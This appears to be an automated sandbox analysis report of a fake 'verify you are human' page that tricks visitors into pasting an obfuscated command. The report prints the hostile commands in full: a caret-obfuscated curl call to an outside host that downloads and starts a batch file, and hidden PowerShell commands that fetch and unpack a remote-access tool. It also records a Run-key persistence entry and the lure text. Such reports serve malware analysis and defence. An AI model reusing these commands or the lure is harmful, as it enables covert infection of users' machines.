                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp

                                  Data Obfuscation

                                  barindex
                                  Obfuscated command line found
                                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
                                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Suspicious powershell command line found
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,37_2_11145440
                                  Source: PCICL32.DLL.34.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7E1E00 pushad ; retf 8B90h34_2_00007FFC8B7E1E83
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8B7F5D7A push cs; iretd 34_2_00007FFC8B7F5D7F
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA50AFB push E8CE8B49h; retf 34_2_00007FFC8BA50B01
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA37934 push ebx; retf 34_2_00007FFC8BA3793A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BA46CA3 push FFFFFFE8h; retf 34_2_00007FFC8BA46CC1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD2425 push ebp; retf 34_2_00007FFC8BCD2428
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD4BB5 push eax; retf 34_2_00007FFC8BCD4BB6
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCB17B push esi; retf 34_2_00007FFC8BCCB17A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCB133 push esi; retf 34_2_00007FFC8BCCB17A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCCB0CA push ebx; retf 34_2_00007FFC8BCCB132
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD26F8 push esi; retf 34_2_00007FFC8BCD26F9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD2EF4 push ss; ret 34_2_00007FFC8BCD2EF7
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD1537 push edx; retf 34_2_00007FFC8BCD1539
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BCD2C98 push esp; ret 34_2_00007FFC8BCD2C99
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_00007FFC8BF52C1A push edx; retf 34_2_00007FFC8BF52C1B
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1116F055 push ecx; ret 37_2_1116F068
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11169F49 push ecx; ret 37_2_11169F5C
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCB6BBF push ecx; ret 37_2_6CCB6BD2
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CCA94C5 push ecx; ret 37_2_6CCA94D8
                                  Source: msvcr100.dll.34.drStatic PE information: section name: .text entropy: 6.909044922675825

                                  Persistence and Installation Behavior

                                  barindex
                                  Detect drive by download via clipboard copy & paste
                                  Source: Chrome DOM: 0.2OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 8ed10zeshpn Performance and security by Cloudflare
                                  Source: screenshotOCR Text: e about:blank -8 x Home Fountain of Health X fountainofhealth.ca/en o x Keyboard Properties Speed Hardware Character repeat Repeat delay .ca Long Short completing the action below Repeat rate: Slow Fast 5 Click here and hold down a keyto test repeat rate: view the security of your connection before proceeding. Cursor blink rate Fast None Complete these verification steps Lise keyboard To prove you are not robot Bopiy Canc 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
                                  Source: screenshotOCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
                                  Source: screenshotOCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
                                  HTML page adds supicious text to clipboard
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Ent
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\client32.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Options\msvcr100.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,37_2_6CC97030
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC85490 GetPrivateProfileIntA,37_2_6CC85490
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_6CC850E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,37_2_6CC850E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,37_2_11127E10
                                  Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11Jump to behavior
                                  Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,37_2_11139090
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,37_2_1115B1D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,37_2_11113290
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,37_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,37_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,37_2_110254A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,37_2_110258F0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,37_2_11023BA0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,37_2_11024280
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11112670 IsIconic,GetTickCount,37_2_11112670
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,37_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,37_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,37_2_110C0BB0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,37_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,37_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,37_2_11143570
                                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
